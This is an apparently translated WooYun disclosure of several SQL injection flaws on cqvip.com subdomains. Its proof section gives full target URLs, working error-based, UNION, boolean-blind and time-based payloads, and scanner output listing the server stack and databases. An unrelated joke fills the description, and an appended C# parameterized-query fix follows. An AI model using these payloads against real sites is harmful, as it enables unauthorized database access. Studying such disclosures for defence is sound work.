
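Vulnerability summary

Bug ID: wooyun-2014-084709

Title: Several SQL injection vulnerabilities in 维普资讯

Vendor: cqvip.com

Author: 路人甲

Submitted: 2014-11-26 10:57

Fixed: 2014-12-01 10:58

Disclosed: 2014-12-01 10:58

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 20

Status: the vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org. For questions or help, contact [email protected]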

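Vulnerability details

Disclosure status:

2014-11-26: Details sent to the vendor, awaiting vendor handling
2014-12-01: The vendor actively ignored the vulnerability; details released to the public

Brief description:

A girl goes to the market to buy vegetables, sees an older woman selling cucumbers, and walks over to buy some.
After she asks the price, the woman asks: are you buying them to eat or to use? If it's to use, I'll give you the thick ones.
She was stunned: since when did market vendors become so open-minded?
The girl, putting on an innocent face, asks: how do you use them?
The woman says: you slice the cucumber and put it on your face, you city people all love that.
Girl, what were you thinking?

Detailed description:

Several SQL injections, the same database!?....

Proof of vulnerability: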

1.http://sci.cqvip.com/Periodical/List.aspx?name=88952634&issn=88952634&sciences=88952634&factor_max=88952634&factor_min=88952634&order=factor_desc 
--- these parameters!!!
Place: GET
Parameter: name
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: name=88952634%' AND 9566=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(102)+CHAR(102)+CHAR(113)+(SELECT (CASE WHEN (9566=9566) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(110)+CHAR(118)+CHAR(119)+CHAR(113))) AND '%'='&issn=88952634&sciences=88952634&factor_max=88952634&factor_min=88952634&order=factor_desc
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: name=88952634%' UNION ALL SELECT CHAR(113)+CHAR(118)+CHAR(102)+CHAR(102)+CHAR(113)+CHAR(90)+CHAR(113)+CHAR(87)+CHAR(109)+CHAR(98)+CHAR(68)+CHAR(84)+CHAR(65)+CHAR(110)+CHAR(85)+CHAR(113)+CHAR(110)+CHAR(118)+CHAR(119)+CHAR(113)-- &issn=88952634&sciences=88952634&factor_max=88952634&factor_min=88952634&order=factor_desc
Place: GET
Parameter: issn
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: name=88952634&issn=88952634%' AND 5256=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(102)+CHAR(102)+CHAR(113)+(SELECT (CASE WHEN (5256=5256) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(110)+CHAR(118)+CHAR(119)+CHAR(113))) AND '%'='&sciences=88952634&factor_max=88952634&factor_min=88952634&order=factor_desc
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: name=88952634&issn=88952634%' UNION ALL SELECT CHAR(113)+CHAR(118)+CHAR(102)+CHAR(102)+CHAR(113)+CHAR(110)+CHAR(71)+CHAR(84)+CHAR(74)+CHAR(113)+CHAR(106)+CHAR(122)+CHAR(81)+CHAR(66)+CHAR(74)+CHAR(113)+CHAR(110)+CHAR(118)+CHAR(119)+CHAR(113)-- &sciences=88952634&factor_max=88952634&factor_min=88952634&order=factor_desc
Place: GET
Parameter: sciences
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: name=88952634&issn=88952634&sciences=88952634%' AND 1318=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(102)+CHAR(102)+CHAR(113)+(SELECT (CASE WHEN (1318=1318) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(110)+CHAR(118)+CHAR(119)+CHAR(113))) AND '%'='&factor_max=88952634&factor_min=88952634&order=factor_desc
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: name=88952634&issn=88952634&sciences=88952634%' UNION ALL SELECT CHAR(113)+CHAR(118)+CHAR(102)+CHAR(102)+CHAR(113)+CHAR(72)+CHAR(119)+CHAR(81)+CHAR(78)+CHAR(110)+CHAR(76)+CHAR(86)+CHAR(116)+CHAR(97)+CHAR(90)+CHAR(113)+CHAR(110)+CHAR(118)+CHAR(119)+CHAR(113)-- &factor_max=88952634&factor_min=88952634&order=factor_desc
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2008
available databases [5]:
[*] master
[*] model
[*] msdb
[*] SupportCenter
[*] tempdb
2.http://train.cqvip.com/search.asp?province=%CA%A1%EF%BF%BD%EF%BF%BD&city=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD&trade=%EF%BF%BD%EF%BF%BD%EF%BF%BD&submit=%EF%BF%BD%EF%BF%BD%D1%B5%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD&pid=88952634&cid=88952634&iid=88952634&tid=8895263
Place: GET
Parameter: iid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pid=18&iid=3) AND 6455=6455 AND (4400=4400
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
Payload: pid=18&iid=-2337) OR 6980=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND (2267=2267
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2008

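Remediation:

Could you send me some latiao (spicy strips) to eat!

Copyright notice: when reposting, please credit the source 路人甲@乌云 (WooYun)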
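Added example, not part of the original report and not the vendor's code: the payloads above break out of a quoted LIKE pattern (name, issn, sciences) and out of a numeric comparison inside parentheses (iid), which is the usual result of building SQL by string concatenation. The C# sketch below shows the corresponding fix on the ASP.NET / SQL Server stack the report identifies, combining a name filter and an iid filter in one query for illustration. The table name, column names, the "factor_asc" value and the PeriodicalSearch class are assumptions.

```csharp
using System;
using System.Collections.Generic;
using System.Data;
using System.Data.SqlClient;

public static class PeriodicalSearch
{
    // ORDER BY cannot be bound as a parameter, so the "order" value is
    // mapped through a fixed whitelist (entries here are hypothetical).
    static readonly Dictionary<string, string> OrderBy = new Dictionary<string, string>
    {
        { "factor_desc", "Factor DESC" },
        { "factor_asc",  "Factor ASC"  }
    };

    // Escape LIKE wildcards so user input is matched literally.
    static string EscapeLike(string s)
    {
        return s.Replace("\\", "\\\\").Replace("%", "\\%")
                .Replace("_", "\\_").Replace("[", "\\[");
    }

    public static DataTable Search(string connStr, string name, string iid, string order)
    {
        // Numeric parameters are parsed and rejected before any SQL is built.
        int iidValue;
        if (!int.TryParse(iid, out iidValue))
            throw new ArgumentException("iid must be an integer");

        string orderSql;
        if (order == null || !OrderBy.TryGetValue(order, out orderSql))
            orderSql = OrderBy["factor_desc"];

        // Hypothetical table and columns. Only orderSql, which comes from the
        // whitelist above, is concatenated; user values travel as parameters.
        string sql = "SELECT Title, Issn, Factor FROM Periodical " +
                     "WHERE Name LIKE @name ESCAPE '\\' AND IndustryId = @iid " +
                     "ORDER BY " + orderSql;

        using (var conn = new SqlConnection(connStr))
        using (var cmd = new SqlCommand(sql, conn))
        {
            cmd.Parameters.Add("@name", SqlDbType.NVarChar, 200).Value =
                "%" + EscapeLike(name ?? "") + "%";
            cmd.Parameters.Add("@iid", SqlDbType.Int).Value = iidValue;
            var table = new DataTable();
            new SqlDataAdapter(cmd).Fill(table); // Fill opens and closes the connection
            return table;
        }
    }
}
```

With bound parameters, a value such as the reported `88952634%' AND ...` string is compared as literal text and never reaches the SQL parser, and a non-integer iid is rejected before a query is issued.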


Vulnerability response

Vendor response:

Severity: no impact, ignored by vendor

Ignored at: 2014-12-01 10:58

Vendor reply:

Latest status:

None

